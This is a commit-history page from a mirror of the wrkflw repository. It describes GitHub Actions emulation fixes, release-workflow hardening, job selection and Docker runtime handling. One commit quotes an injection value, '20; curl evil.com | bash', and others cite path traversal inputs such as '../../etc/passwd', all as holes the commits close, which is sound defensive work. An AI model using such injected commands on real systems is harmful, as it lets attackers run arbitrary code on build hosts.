mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2026-05-18 05:05:35 +02:00
6016887a3b5c71601bdb00331b24186bcd279c55
223 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
6016887a3b |
feat(executor): easy GHA emulation fixes for better compatibility (#82)
* feat(executor): add easy GHA emulation fixes for better compatibility
- Expand github.* context with 13 missing env vars (CI, GITHUB_ACTIONS,
GITHUB_REF_NAME, GITHUB_REF_TYPE, GITHUB_REPOSITORY_OWNER, etc.) and
improve GITHUB_ACTOR to use git config / $USER instead of hardcoded value
- Enforce timeout-minutes at both job level (default 360m per GHA spec)
and step level via tokio::time::timeout
- Implement defaults.run.shell and defaults.run.working-directory with
proper fallback chain: step > job defaults > workflow defaults > bash
- Implement hashFiles() expression function with glob matching, sorted
file hashing (SHA-256), and integration into the substitution pipeline
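The fallback chain for `defaults.run.shell` described above can be sketched as a simple `Option` cascade. This is a minimal illustration, not the executor's code: `resolve_shell` and its parameters are hypothetical names, and only the precedence order (step > job defaults > workflow defaults > bash) comes from the commit message.

```rust
/// Pick the shell for a `run:` step.
/// Precedence: step > job defaults > workflow defaults > "bash".
/// (Hypothetical helper; only the ordering is taken from the commit message.)
fn resolve_shell<'a>(
    step: Option<&'a str>,
    job_default: Option<&'a str>,
    workflow_default: Option<&'a str>,
) -> &'a str {
    step.or(job_default)
        .or(workflow_default)
        .unwrap_or("bash")
}
```

The same shape would apply to `working-directory`, with the workspace root as the final fallback instead of `bash`.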
* fix(executor): harden hashFiles, working-directory, and shell -e
Three issues from code review, all in the "we got the GHA emulation
*almost* right" category:
1. hashFiles() was returning an empty string when no files matched.
GHA returns the SHA-256 of empty input (e3b0c44...), not nothing.
An empty string as a cache key component is the kind of thing
that silently ruins your day. Also, unreadable files were being
skipped without a peep — now we at least warn about it.
2. The working-directory default resolution was doing a naive
Path::join with user-controlled input. If someone writes
`working-directory: ../../../etc` or an absolute path, join
happily replaces the base. Inside a container this is *somewhat*
contained, but in emulation mode it's a real path traversal.
Normalize the path and reject anything that escapes the
workspace.
3. The bash -e flag change (correct per GHA spec) was undocumented.
Scripts that relied on intermediate commands failing without
aborting the step will now break. Document it in
BREAKING_CHANGES.md so users aren't left guessing.
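The path traversal fix in item 2 can be sketched with a purely lexical normalization. This is an assumption about the approach, not the project's actual code: `resolve_working_directory` is a hypothetical name, and the sketch does not resolve symlinks or touch the filesystem.

```rust
use std::path::{Component, Path, PathBuf};

/// Resolve `working_directory` against `workspace`, rejecting anything
/// that would escape it. Hypothetical helper, lexical checks only.
fn resolve_working_directory(
    workspace: &Path,
    working_directory: &str,
) -> Result<PathBuf, String> {
    let mut relative = PathBuf::new();
    for component in Path::new(working_directory).components() {
        match component {
            Component::Normal(part) => relative.push(part),
            Component::CurDir => {}
            Component::ParentDir => {
                // pop() returns false once nothing is left, which means
                // this `..` would climb above the workspace root.
                if !relative.pop() {
                    return Err(format!(
                        "working-directory '{working_directory}' escapes the workspace"
                    ));
                }
            }
            // Absolute paths would make Path::join discard the base.
            Component::RootDir | Component::Prefix(_) => {
                return Err(format!(
                    "working-directory '{working_directory}' must be relative"
                ));
            }
        }
    }
    Ok(workspace.join(relative))
}
```

Rejecting absolute paths up front matters because `Path::join` replaces the base entirely when its argument is absolute.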
* fix(executor): complete the GHA shell invocation and harden hashFiles
The previous commit added `-e` to bash but stopped there, even
though the BREAKING_CHANGES.md *literally documented* the full GHA
invocation as `bash --noprofile --norc -e -o pipefail {0}`. So we
were advertising behavior we weren't actually implementing. This is
not great.
Without `-o pipefail`, piped commands like `false | echo ok` would
silently succeed, which is exactly the kind of divergence that makes
you distrust an emulator. And without `--noprofile --norc`, user
profile scripts can interfere with reproducibility.
While at it, fix hashFiles error handling — it was silently
swallowing read errors and producing a partial hash, which is worse
than failing because you get a *wrong* cache key with no indication
anything went sideways. preprocess_hash_files and
preprocess_expressions now return Result and the engine surfaces
failures as step errors.
Also add the tests that should have been there from the start:
shell invocation flags, working-directory path traversal rejection,
and defaults cascade (step > job > workflow).
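For reference, the full bash invocation quoted above can be expressed as an argv builder. This is only a sketch: `bash_invocation` is a hypothetical name, and the one thing taken from the commit message is the flag list `bash --noprofile --norc -e -o pipefail {0}`, where `{0}` stands for the script path.

```rust
/// Build the argv for running a step script under bash the way the commit
/// message describes the GHA invocation. Hypothetical helper.
fn bash_invocation(script_path: &str) -> Vec<String> {
    [
        "bash",
        "--noprofile", // skip login profile scripts
        "--norc",      // skip ~/.bashrc
        "-e",          // abort on the first failing command
        "-o",
        "pipefail",    // a failing stage fails the whole pipeline
        script_path,
    ]
    .iter()
    .map(|arg| arg.to_string())
    .collect()
}
```

With `pipefail` set, a pipeline such as `false | echo ok` reports failure instead of taking the exit status of the last stage.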
* fix(executor): harden hashFiles, timeout, and shell edge cases
The previous round of GHA emulation fixes left a few holes that
would bite you in production:
hashFiles() would happily glob '../../etc/passwd' and hash whatever
it found outside the workspace. It also loaded entire file contents
into memory before hashing, which is *not great* when someone points
it at a large binary artifact. The glob patterns now reject '..'
traversal, and file contents are streamed into the SHA-256 hasher
via io::copy instead.
timeout-minutes accepted any f64 from YAML, including negative
values, NaN, and infinity — all of which make Duration::from_secs_f64
panic. Non-finite and non-positive values now fall back to the GHA
default of 360 minutes.
Unknown shell values were silently accepted with a '-c' fallback.
Now they emit a warning so you at least *know* something is off.
While at it, replaced the hash_files_read_error_returns_err test
that was testing two Ok paths (despite its name) with proper
path-traversal rejection tests.
* fix(executor): fix shadowed timeout_mins and extract sanitization helper
It turns out the job timeout error path was re-reading the *raw*
timeout_minutes value instead of using the already-sanitized one.
If someone set timeout-minutes to NaN or a negative number, the
sanitization would correctly fall back to 360, but the error
message would happily print "Job exceeded timeout of NaN minutes."
Not great.
Extract sanitize_timeout_minutes() so both the job and step
timeout paths use the same logic instead of duplicating the
is_finite/positive/clamp dance. While at it, add proper tests
for NaN, Infinity, negative, zero, and the max clamp — plus a
test that actually exercises the job-level timeout expiry branch,
which previously had zero coverage.
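A sanitization helper along these lines might look like the sketch below. It is an illustration under stated assumptions: the commit message names `sanitize_timeout_minutes()` but does not show its signature, so the `Option<f64>` input and the `max_minutes` parameter are hypothetical, and the clamp ceiling is passed in because the message does not state its value.

```rust
use std::time::Duration;

/// GHA default job timeout, per the commit message.
const DEFAULT_TIMEOUT_MINUTES: f64 = 360.0;

/// Return a timeout that is safe to hand to Duration::from_secs_f64.
/// NaN, infinities, zero, and negatives fall back to the default;
/// large values are clamped to `max_minutes` (hypothetical parameter).
fn sanitize_timeout_minutes(raw: Option<f64>, max_minutes: f64) -> f64 {
    match raw {
        Some(minutes) if minutes.is_finite() && minutes > 0.0 => minutes.min(max_minutes),
        _ => DEFAULT_TIMEOUT_MINUTES,
    }
}

/// Convert sanitized minutes to a Duration. Only call this with the
/// sanitized value: from_secs_f64 panics on negative or non-finite input.
fn timeout_duration(sanitized_minutes: f64) -> Duration {
    Duration::from_secs_f64(sanitized_minutes * 60.0)
}
```

Using the sanitized value for both the timer and the error message avoids the "timeout of NaN minutes" output described above.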
|
||
|
|
040276e40a |
ci: modernize workflows to match mdterm CI pattern (#81)
* ci: modernize workflows to match mdterm CI pattern
Replace monolithic build.yml with split ci.yml (parallel fmt, clippy,
build+test jobs). Update all actions to modern versions (checkout@v4,
dtolnay/rust-toolchain, rust-cache@v2). Overhaul release workflow with
more build targets (musl, aarch64), simpler changelog, and crates.io
publish step.
* ci: fix broken cross-compilation targets and workspace publish
It turns out that the release workflow had a couple of targets that
were never going to work on GitHub-hosted runners.
The aarch64-pc-windows-msvc target needs ARM64 MSVC build tools
that simply aren't installed on windows-latest runners. And the
aarch64-unknown-linux-musl target was configured with
aarch64-linux-gnu-gcc as its linker — which is a *glibc* linker,
not a musl one. The resulting binaries would silently be linked
against glibc, completely defeating the point of a musl build.
Remove both broken targets rather than papering over them with
increasingly fragile cross-compilation hacks. The remaining six
targets are all either native builds or well-supported cross-
compilation (aarch64-linux-gnu with the correct gnu linker).
While at it, fix cargo publish — a bare `cargo publish` from a
workspace root doesn't know how to publish crates in dependency
order. Use cargo-workspaces which actually handles this correctly.
Also restore workflow_dispatch to CI so it can be triggered
manually when needed.
* ci: fix review issues in modernized workflows
The CI and release workflows from the previous modernization had a
few things that were just *not right*.
The CI build job was running `cargo build --release` which is
pointless in CI — we care about correctness and fast feedback, not
optimized binaries. It was also missing `--workspace` on both build
and test, so we were only checking whatever the root workspace
defaults resolved to. Clippy had the same problem — only linting
default features of default members, blissfully ignoring everything
else.
The release workflow had three issues: `git log HEAD` for first
releases only shows a single commit instead of the full history,
`--allow-dirty` on cargo publish silently masks unexpected checkout
state, and the workflow_dispatch trigger got dropped so there's no
way to manually re-run a failed release without pushing a new tag.
Fix all of it. Add --workspace and --all-features where they belong,
drop --release from CI build, fix the changelog range for first
releases, remove --allow-dirty, and restore workflow_dispatch.
* ci(release): harden release workflow against manual dispatch footguns
The release workflow had a bare workflow_dispatch trigger with no
inputs, which means manually re-running a failed release would use
the *branch name* as the tag. The changelog would be wrong, the
release would be named after a branch, and the publish job would
cheerfully push to crates.io regardless. Not great.
Three fixes:
Require a tag input on workflow_dispatch so manual re-runs actually
know what they're releasing. The changelog and release creation now
use inputs.tag || github.ref_name so both paths resolve correctly.
Guard the publish job with an if: startsWith(github.ref,
'refs/tags/v') check, because publishing to crates.io is
irreversible and "oops" is not an acceptable rollback strategy.
While at it, replace the cd-into-directory-and-back tar pattern
with tar -C, because changing directories in a shell script and
hoping you cd back correctly is the kind of thing that works right
up until it doesn't.
* ci: fix workflow_dispatch releasing into the void
The release workflow happily accepts a manual dispatch with any tag
string, then passes it to git log and softprops/action-gh-release
without ever checking if the tag actually *exists* as a git ref.
Confusion ensues — changelog generation silently produces garbage
and the release gets created pointing at nothing useful.
Add a tag validation step that fails fast with a clear error before
any downstream jobs run. Since both build and release already depend
on the changelog job via `needs`, this acts as a proper gate.
While at it, add --all-features to the CI build and test steps so
feature-gated code actually gets compiled and tested, not just
linted by clippy. Having clippy check code that never gets built
is the kind of false confidence that bites you on release day.
* ci(release): tighten tag validation and deduplicate tag resolution
The tag validation step was using `git rev-parse`, which happily
accepts *any* git ref — branches, commit SHAs, you name it. So if
someone created a branch called `v1.0.0` (don't ask), it would
sail right through validation and produce a release pointing at a
branch. Not great.
Switch to `git tag -l` so we only accept actual tags. That's the
whole point of a *tag* validation step.
While at it, hoist the `inputs.tag || github.ref_name` expression
into a workflow-level RELEASE_TAG env var instead of repeating it
in four different places. Also add a comment on the publish job's
`if` guard explaining that excluding manual dispatch is intentional
— because some future maintainer *will* look at that and think
it's a bug.
* ci(release): fix three lurking bugs in release workflow
The release workflow had a few issues that were just waiting to
bite someone at the worst possible time:
The prev_tag selection was grabbing *any* tag sorted by version,
not just version tags. If someone ever pushed a non-v* tag (say,
a test tag or a label), the changelog range would silently use
that as the baseline. Filter for "^v" prefixed tags first.
The cargo-workspaces install was unpinned, which means a breaking
release of that tool would break *our* release pipeline. In a
release workflow. The irony writes itself. Pin to 0.4.2.
While at it, fix the .cargo/config.toml creation for
aarch64-linux-gnu cross-compilation to use > instead of >> for
the first line, so we don't append duplicate entries if the file
somehow already exists.
* ci(release): fix three review issues in release workflow
The release workflow had a few things that would bite you at
exactly the wrong moment:
The prev_tag selection was using grep -v to exclude the current
tag, then grabbing the first result from a descending version
sort. Problem is, if you're doing a backport release for v1.0.1
and v2.0.0 already exists, you'd get v2.0.0 as your "previous"
tag. The changelog range would then be backwards and produce
garbage. Use sed to find the current tag's position in the sorted
list and grab the one *after* it instead.
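The prev_tag selection logic is easier to see outside of shell. The workflow itself uses sed on a sorted tag list; the Rust sketch below only illustrates the idea of taking the entry after the current tag in a newest-first list, and `previous_tag` is a hypothetical name.

```rust
/// Given tags sorted newest-first by version, return the tag that comes
/// right after `current`, i.e. the release it should be diffed against.
/// Hypothetical helper; the real workflow does this in shell.
fn previous_tag<'a>(tags_desc: &[&'a str], current: &str) -> Option<&'a str> {
    // Exact string comparison, so dots in the tag are never treated as wildcards.
    let position = tags_desc.iter().position(|tag| *tag == current)?;
    tags_desc.get(position + 1).copied()
}
```

For a backport of v1.0.1 with v2.0.0 already published, the list is `v2.0.0, v1.0.1, v1.0.0`, and the entry after v1.0.1 is v1.0.0 rather than v2.0.0.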
The build job had no dependency on the changelog job, which means
tag validation could fail and six runners would still happily
churn away building binaries that nobody will ever use. Waste of
perfectly good CI minutes. Add needs: [changelog] so builds are
gated behind validation.
While at it, cap the first-release changelog to 100 commits. An
unbounded git log dumped into a GitHub release body is the kind
of thing that works fine until your repo has a thousand commits
and the API starts having opinions about payload size.
* ci(release): parallelize build, validate tag format, cache cargo-workspaces
Three things that should have been caught earlier:
The build job had a `needs: [changelog]` dependency for absolutely
no reason — it doesn't use any changelog outputs. All it did was
serialize the pipeline and add ~20s of dead time before the actual
builds started. The release and publish jobs already depend on both,
so the ordering was always preserved where it matters. Remove it.
The RELEASE_TAG env var comes from user input on workflow_dispatch,
and we were feeding it straight into sed patterns and git log range
expressions without validating the format first. Add a regex check
for vX.Y.Z *before* any shell interpolation happens. Defense in
depth — the trust boundary is already at repo write access, but
let's not be sloppy about it.
While at it, cache the cargo-workspaces binary in the publish job.
Compiling it from source on every single release is the kind of
waste that's easy to ignore until you don't.
* ci: harden CI permissions and fix release tag validation
The CI workflow was running with default token permissions, which
is more access than a read-only lint-and-build pipeline should ever
have. Add an explicit `permissions: { contents: read }` because
least-privilege is not optional.
The tag format regex in the release workflow was unanchored — it
matched *prefixes*, so `v1.0.0garbage` sailed right through. Anchor
it with `$` and add an optional pre-release suffix group so tags
like `v1.0.0-beta.1` still work. Please don't ship unanchored
validation regexes.
While at it, replace the sed-based prev-tag lookup with `grep -F -x`
for exact matching. The old sed pipeline treated dots in the tag as
regex wildcards, which is the kind of thing that works fine until it
doesn't. The new approach does literal matching and handles the
no-previous-tag edge case explicitly.
* ci(release): add --locked to builds and guard changelog tag lookup
The release builds were running without --locked, which means cargo
is free to re-resolve dependencies however it pleases. For a release
binary, that's *not great* — you want reproducible builds from the
exact Cargo.lock that was committed, not whatever cargo feels like
doing today.
While at it, the changelog generation was silently falling through
to the "list all commits" path if the release tag wasn't found in
the tag list. Now it emits a ::warning annotation so you at least
know something went sideways instead of staring at a suspiciously
long changelog wondering where it all came from.
|
||
|
|
14d30b6b57 |
feat(ui): add job selection mode to TUI for running individual jobs (#80)
* feat(ui): add job selection mode to TUI for running individual jobs
The CLI already has --job to run a single job, but the TUI had no
way to do this. You could only run entire workflows, which is the
kind of all-or-nothing approach that gets old fast when you have a
workflow with 12 jobs and you just want to re-run "lint".
Add a job selection sub-view to the Workflows tab. Press Enter on a
workflow to drill into its jobs (parsed via parse_workflow), then
Enter on a job to run just that one (with its transitive deps), or
'a' to run all, or Esc to go back. The selected job flows through
as target_job in ExecutionConfig, reusing the exact same filtering
logic the CLI --job flag already uses.
While at it, updated the status bar hints and help overlay to
document the new keybindings.
* fix(ui): stop target_job from leaking across queued workflows
The job selection feature added in
|
||
|
|
f05cbca3b9 |
feat(ui): make TUI optional behind a cargo feature flag (#79)
* feat(ui): make TUI optional behind a cargo feature flag
The TUI is great for interactive use, but if you want to run wrkflw as a headless CI runner, dragging in ratatui and crossterm is pointless baggage. Issue #41 asked for this, and honestly the code was already well-isolated enough that it *should* have been optional from the start.
Add a `tui` feature flag (default-on) to both the `wrkflw-ui` crate and the main binary crate. When disabled via `--no-default-features`, ratatui/crossterm are gone, the `tui` subcommand disappears, and running with no args prints help instead of launching the TUI. All CLI subcommands (validate, run, trigger, list) remain fully functional.
While at it, removed the direct crossterm/ratatui deps from the binary crate: it never imported them, they were just coming through transitively anyway.
* refactor(ui): feature-gate models and utils, clean up cfg imports
The previous commit gated the TUI behind a feature flag but left the models and utils modules unconditionally compiled. It turns out that *every single consumer* of those modules is TUI-gated code, so they were compiling to dead code when building with --no-default-features.
Gate models and utils behind cfg(feature = "tui") where they belong. While at it, consolidate the five separate #[cfg(feature = "tui")] annotations on imports in workflow.rs into a single grouped use block, because repeating the same attribute five times in a row is not my idea of readability.
Also add a cargo check --no-default-features step to CI so this kind of thing doesn't silently regress.
* ci(build): drop archived actions-rs/cargo, add --workspace to feature check
The actions-rs/cargo@v1 action has been archived for a while now, and wrapping every cargo invocation in a GitHub Action that just... calls cargo... was never exactly adding value. Replace all five uses with plain `run: cargo <cmd>` steps.
While at it, add --workspace to the --no-default-features check so it actually verifies *all* crates compile without the tui feature, not just the default workspace member. The previous version would happily miss breakage in any non-default crate. |
||
|
|
ebabe6414a |
feat(validate): cross-check local composite action required inputs (#78)
* feat(validate): cross-check local composite action required inputs
The validate command was happily declaring workflows "valid" even when they used a local composite action without providing its required inputs. The workflow would then blow up at runtime, which is *exactly* the kind of thing a validator should catch.
The problem was that validate_action_reference() only checked whether the local action path existed on disk. It never bothered to read the action.yml, look at the inputs section, or verify that required inputs were actually provided in the step's `with:` block. So it was doing about half its job.
Thread the repo root path through the validator call chain (evaluate_workflow_file → validate_jobs → validate_steps → validate_action_reference) so we can resolve local action paths. Then read and parse the action.yml, extract inputs with `required: true` and no default, and flag any that are missing from the step's `with:` params. Case-insensitive matching because that's what GitHub Actions does.
Graceful degradation: if we can't find the repo root or the action file is unreadable, we silently skip rather than blowing up. 10 new unit tests cover the various cases.
Closes #67
* fix(validate): handle string `required` and drop unsafe cwd fallback
Two bugs in the local action input validation that just landed:
First, `find_repo_root` was falling back to `current_dir()` when no `.git` directory was found. This is *wrong*: if you're validating a workflow outside a git repo, the cwd could be literally anywhere, and you'd end up resolving local action paths against some random directory. Return `None` and skip the check instead.
Second, `required: 'true'` (as a YAML string) was silently treated as not required, because we only checked `as_bool()`. GitHub Actions treats the string "true" as truthy, so we should too. Add case-insensitive string matching alongside the bool check.
While at it, add a test for the string `required` case so we don't regress on this. |
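The required-input check, including the string `required: 'true'` case, can be sketched as follows. All types here are hypothetical stand-ins so the example stays dependency-free: `YamlValue` mimics only the variants needed, and `ActionInput` and `missing_required_inputs` are illustrative names rather than the validator's real API.

```rust
/// Minimal stand-in for a parsed YAML scalar (hypothetical type).
enum YamlValue {
    Bool(bool),
    String(String),
    Null,
}

/// One entry of an action.yml `inputs:` section (hypothetical type).
struct ActionInput {
    name: String,
    required: YamlValue,
    has_default: bool,
}

/// Treat both `true` and the string "true" (any case) as required.
fn is_required(value: &YamlValue) -> bool {
    match value {
        YamlValue::Bool(flag) => *flag,
        YamlValue::String(text) => text.eq_ignore_ascii_case("true"),
        YamlValue::Null => false,
    }
}

/// Names of inputs that are required, have no default, and are absent
/// from the step's `with:` keys (compared case-insensitively).
fn missing_required_inputs<'a>(inputs: &'a [ActionInput], with_keys: &[&str]) -> Vec<&'a str> {
    inputs
        .iter()
        .filter(|input| is_required(&input.required) && !input.has_default)
        .filter(|input| !with_keys.iter().any(|key| key.eq_ignore_ascii_case(&input.name)))
        .map(|input| input.name.as_str())
        .collect()
}
```

Inputs with a default are skipped because the action can still run when the caller omits them.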
||
|
|
452044f9d2 |
feat(cli): add --job flag to run a specific job and --jobs to list them (#77)
* feat(cli): add --job flag to run a specific job and --jobs to list them
Until now, wrkflw only operated at the workflow level. You could run an entire workflow or list workflow files, but if you wanted to debug a single failing job you had to sit through every other job first. This is not great.
Add `--job <name>` to `wrkflw run` so you can execute exactly one job in isolation, skipping dependency resolution entirely. Add `--jobs` to `wrkflw list` so you can actually *see* what jobs are available before running them. Both work for GitHub workflows and GitLab pipelines.
The filtering happens after dependency resolution: we just replace the execution plan with a single-job batch. If the job name doesn't exist, we tell you what's available instead of silently doing nothing. The TUI still runs full workflows; job selection there is a separate concern.
Closes #68
* fix(executor): include transitive deps when running a single job
The --job flag was replacing the entire execution plan with just the target job, silently dropping all its dependencies. So if you ran --job deploy and deploy needs build which needs setup, you'd get deploy running alone with none of its prerequisites. Confusion ensues.
Extract the duplicated inline filtering (copy-pasted verbatim across both the GitHub and GitLab execution paths) into a shared filter_plan_to_job() helper in dependency.rs. The new logic walks the needs graph via BFS to collect transitive deps, then prunes the existing topologically-sorted plan to only include relevant jobs while preserving batch ordering.
Add 9 unit tests covering the dependency collection and plan filtering: linear chains, diamond graphs, partial subgraph isolation, error paths, and empty batch removal.
* fix(executor): use stage-aware filtering for GitLab --job flag
It turns out that filter_plan_to_job walks `needs` edges to find transitive dependencies, which works fine for GitHub workflows. But GitLab pipelines use *stage ordering* for implicit dependencies, and convert_to_workflow_format sets `needs: None` on every converted job. So running `--job deploy` on a GitLab pipeline would silently drop all build and test jobs. Not great.
Add filter_plan_to_job_by_stage that understands the GitLab model: keep all jobs in earlier stage batches (they're implicit deps) and filter only the target's own batch down to just the target job. The GitHub workflow path continues using the needs-based filter.
While at it, extract the job-not-found error into a shared helper and add proper test coverage: 6 unit tests for the stage-aware filter plus 3 integration tests exercising the full execute_workflow path with target_job set. |
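The needs-based filtering described for the GitHub path (BFS over `needs`, then pruning the batched plan) can be sketched like this. It is a simplified illustration, not the code in dependency.rs: the function names, the `HashMap<String, Vec<String>>` graph shape, and the `Vec<Vec<String>>` plan shape are all assumptions.

```rust
use std::collections::{HashMap, HashSet, VecDeque};

/// Collect `target` plus everything it transitively needs, via BFS.
/// Returns None when the target job does not exist. Hypothetical helper.
fn collect_transitive_deps(
    needs: &HashMap<String, Vec<String>>,
    target: &str,
) -> Option<HashSet<String>> {
    if !needs.contains_key(target) {
        return None;
    }
    let mut seen = HashSet::new();
    let mut queue = VecDeque::new();
    seen.insert(target.to_string());
    queue.push_back(target.to_string());
    while let Some(job) = queue.pop_front() {
        for dep in needs.get(&job).into_iter().flatten() {
            // insert() returns true only the first time a job is seen.
            if seen.insert(dep.clone()) {
                queue.push_back(dep.clone());
            }
        }
    }
    Some(seen)
}

/// Keep only the jobs in `keep`, preserving batch order and dropping
/// batches that end up empty. Hypothetical helper.
fn prune_plan(plan: &[Vec<String>], keep: &HashSet<String>) -> Vec<Vec<String>> {
    plan.iter()
        .map(|batch| {
            batch
                .iter()
                .filter(|job| keep.contains(*job))
                .cloned()
                .collect::<Vec<_>>()
        })
        .filter(|batch| !batch.is_empty())
        .collect()
}
```

Pruning the already sorted plan, rather than re-sorting the subgraph, keeps the original batch ordering intact.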
||
|
|
781bd42b21 |
fix(docker): persist setup action images across job steps (#76)
* fix(docker): persist setup action images across job steps
Reported in #60. When a workflow uses actions like setup-node or setup-php, the Docker image resolved for that action (e.g. node:20-slim, composer:latest) was only used for the action step itself. Every subsequent `run:` step would blissfully fall back to ubuntu:latest, which of course has neither node nor composer. Confusion ensues.
It turns out that `execute_job()` computes `runner_image_value` exactly *once* via `get_effective_runner_image()` and never updates it. The action step gets its own image from `prepare_action()`, but that image is completely ignored for subsequent `run:` steps. So your setup-node configures... nothing, as far as run steps care.
Fix this by pre-scanning all job steps for known setup actions before the step loop begins. Single setup action? Use its image. Multiple setup actions (e.g. Laravel's PHP + Node.js combo)? Build a combined Dockerfile that installs all required runtimes on the ubuntu base. No setup actions? Nothing changes, so this is fully backward compatible.
While at it, skip the pointless pull attempt for locally-built wrkflw-* images (they only exist locally, the 404 from Docker Hub was just noise), and bump the build_image timeout from 2 minutes to 10, because installing PHP from a PPA inside a Docker build is not a speed demon.
Closes #60
* fix(docker): harden setup action runtime detection against injection and waste
The setup action detection code was interpolating user-controlled version strings straight into Dockerfile RUN directives with zero validation. So a workflow with node-version: "20; curl evil.com | bash" would happily inject arbitrary commands into the build. This is not great.
It also used starts_with() for action name matching, which would match actions/setup-node-legacy or anything else that happened to share the prefix. And every single build generated a UUID-tagged image that was never cleaned up, so you'd accumulate orphaned wrkflw-combined:* images until your disk had opinions about it.
While at it, the 2-minute to 10-minute timeout bump was applied to *all* image builds, not just the combined runtime ones that actually need it. And the Go install script hardcoded linux-amd64, which is the kind of thing that works right up until someone runs on ARM.
Let's fix all of it:
- Validate version strings against [a-zA-Z0-9._-] before use
- Use exact equality for action repo matching, not prefix matching
- Use deterministic content-based image tags so identical runtime combinations reuse cached images
- Deduplicate same-language setup steps (last one wins)
- Scope the 10-minute timeout to wrkflw-combined:* builds only
- Detect container architecture for Go installs
- Add tests for all of the above
* fix(docker): fix three correctness bugs in setup action image resolution
The previous commit introduced setup action detection, but it had a few problems that would bite people in practice.
First, the single-runtime path was returning bare images like node:20-slim or python:3.12-slim directly. These images don't have git installed, which means actions/checkout (typically the *first* step in any workflow) would just fail. Not great. Fix: always build a combined image on top of the runner base (catthehacker/ubuntu:act-latest) even for single-runtime jobs, so git and friends remain available. The SetupRuntime.image field is now dead code, so remove it entirely.
Second, the Python install script was cheerfully ignoring the requested version and installing whatever python3 the distro ships. Ask for 3.12, get 3.10. Surprise. Fix: use the deadsnakes PPA to install the specific version requested.
Third, PodmanRuntime had no skip-pull guard for locally-built wrkflw-* images, so podman would attempt to pull wrkflw-combined:* from a registry. Add --pull=never for wrkflw-* prefixed images.
* refactor(docker): unify setup action registry and fix remaining review issues
The previous commits introduced setup action detection, but left a few things in a state that would annoy anyone who looked closely.
First, determine_action_image() was still using starts_with() for action matching, the exact same bug that detect_setup_runtimes had already fixed. So "actions/setup-node-legacy" would happily match as a Node.js setup action. Not great.
Second, dtolnay/rust-toolchain conventionally encodes the toolchain in the @ref (e.g., @nightly, @1.75.0), not in a with.toolchain key. The old code would silently default to "stable" for anyone using the idiomatic form. Surprise.
Third, the repetitive if/else chain in detect_setup_runtimes (seven near-identical blocks) and the parallel match in determine_action_image were two independent copies of the same knowledge, with no compile-time guarantee they'd stay in sync. Adding a new setup action meant editing two places and hoping you remembered both.
Fix all of it:
- Introduce a single SETUP_ACTIONS const table that both functions consume, eliminating the drift risk entirely
- Add version_from_ref support so dtolnay/rust-toolchain@nightly actually produces "nightly" instead of "stable"
- Extract generate_combined_dockerfile() and combined_image_tag() as pure testable functions
- Merge all install scripts into a single RUN layer instead of N separate apt-get update calls
- Include a content hash in image tags so install script changes invalidate cached images even when language/version pairs are the same
- Add 15 tests covering all the above
* fix(docker): add image caching, stable hashing, and shared constants
The combined runtime image code had three problems that were all independently annoying but together made for a lovely trifecta of "why is this slow and also fragile."
First, build_combined_runtime_image was *always* rebuilding the Docker image, even when a perfectly good one already existed locally. That means every single job run was creating temp dirs, writing Dockerfiles, tarring contexts, and shipping them to the daemon. For absolutely no reason.
Second, the image tag hash used DefaultHasher, which Rust's own docs explicitly say is not stable across versions. So upgrading your Rust toolchain silently invalidates every cached image. Not great when caching is the whole point.
Third, the "wrkflw-" and "wrkflw-combined:" prefixes were hardcoded as magic strings in three separate files. Change one, forget the others, and you get to debug why podman is trying to pull a locally-built image from Docker Hub.
The fix: add image_exists() to ContainerRuntime so we can skip redundant builds, replace DefaultHasher with FNV-1a for stable cross-version hashing, and extract the prefixes into shared constants. While at it, merge the duplicate apt-get update calls in the generated Dockerfile into a single RUN layer.
* fix(docker): fix version_from_ref with SHA pins and normalize .x suffixes
The version_from_ref logic for dtolnay/rust-toolchain was happily treating a pinned git SHA (the 40-char hex kind) as a toolchain name. So `dtolnay/rust-toolchain@d4ff7a3c5...` would try to install Rust toolchain "d4ff7a3c5...", which rustup finds *deeply* confusing. Filter out bare SHAs with the existing is_git_sha() check and fall back to the default version instead.
While at it, the ".x" suffix that's idiomatic for Node versions (e.g., "16.x") was leaking through to install scripts for every language. Python would try to apt-get install python16.x, which is not a real package and never will be. Normalize the suffix away at extraction time rather than making each install script deal with it independently.
Add tests for both cases. |
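The switch from DefaultHasher to FNV-1a for image tags can be illustrated with a small standalone sketch. The FNV-1a constants are the standard 64-bit ones; everything else is an assumption for illustration: `sketch_image_tag` is a hypothetical name, and the key layout fed into the hash is not taken from the project.

```rust
/// 64-bit FNV-1a: XOR each byte into the hash, then multiply by the prime.
/// The output depends only on the input bytes, not on the Rust version.
fn fnv1a_64(bytes: &[u8]) -> u64 {
    const OFFSET_BASIS: u64 = 0xcbf29ce484222325;
    const PRIME: u64 = 0x100000001b3;
    bytes
        .iter()
        .fold(OFFSET_BASIS, |hash, &byte| (hash ^ u64::from(byte)).wrapping_mul(PRIME))
}

/// Derive a deterministic tag from (language, version) pairs.
/// Hypothetical helper: the "lang=version;..." key layout is an assumption.
fn sketch_image_tag(runtimes: &[(&str, &str)]) -> String {
    let mut sorted = runtimes.to_vec();
    sorted.sort(); // same set of runtimes gives the same tag in any order
    let key = sorted
        .iter()
        .map(|(lang, version)| format!("{lang}={version}"))
        .collect::<Vec<_>>()
        .join(";");
    format!("wrkflw-combined:{:016x}", fnv1a_64(key.as_bytes()))
}
```

Because the tag is a pure function of its inputs, an existence check on that tag is enough to decide whether a rebuild can be skipped.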
||
|
|
fd348a460e |
fix: actually execute Docker-based GitHub Actions instead of emulating them (#74)
* fix(executor): actually execute Docker-based GitHub Actions instead of emulating them
Third-party GitHub Actions that use Docker (like super-linter) were silently passing without ever *actually running*. The engine would resolve the action, pick a Docker image, and then... run `echo 'Would execute GitHub action: ...'` inside it. Every single time. Regardless of runtime mode. Confusion ensues.
It turns out there were two separate failures conspiring here:
1. `prepare_action()` would error out on `ActionType::DockerBuild` with "not yet supported", fall back to `determine_action_image()`, and cheerfully return `node:20-slim` for super-linter. This is not great.
2. The `PreparedAction::Image` execution branch had three sub-paths for is_docker, is_local, and everything else, and *all three* just ran echo commands. The image was resolved correctly and then completely ignored.
The fix has several parts:
- Add a `NativeDocker` variant to `PreparedAction` that means "run this image with its built-in ENTRYPOINT, no command override." Docker registry actions and DockerBuild actions both use this.
- Implement DockerBuild properly: clone the repo, resolve the Dockerfile path from action.yml, build it, return the tag. Uses the existing `shallow_clone` and `runtime.build_image`.
- Fix `build_image_inner` to tar the *full context directory* instead of just the Dockerfile. The old code had `_context_dir` sitting right there, computed and unused. COPY instructions in Dockerfiles need the context, obviously.
